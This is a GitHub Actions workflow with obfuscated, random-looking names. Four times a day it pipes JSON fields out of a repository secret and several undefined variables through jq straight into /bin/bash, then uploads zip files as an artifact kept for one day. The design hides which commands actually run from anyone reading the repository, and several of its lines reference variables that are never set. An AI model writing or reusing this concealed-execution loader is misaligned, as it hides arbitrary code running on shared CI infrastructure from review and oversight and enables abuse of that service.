name: aizhonghuifa
on:
  workflow_dispatch:

  schedule:
    - cron: '33 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: aizhonghuifa
        env:
          gwivg00644: ${{ secrets.gwivg00644 }}
        run: |
          printf '%s' "$gwivg00644" | jq -r .izte74555 | /bin/bash
          printf '%s' "$kynt843" | jq -r .bttte8 | /bin/bash
          printf '%s' "$oonaz0014" | jq -r .azdh6 | /bin/bash
          printf '%s' "$zn57" | jq -r .kwgej6140 | /bin/bash
          echo $mrcbw41 | jq -r .cd5719 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: iV13gI9A
          path: "*.zip"
          retention-days: 1
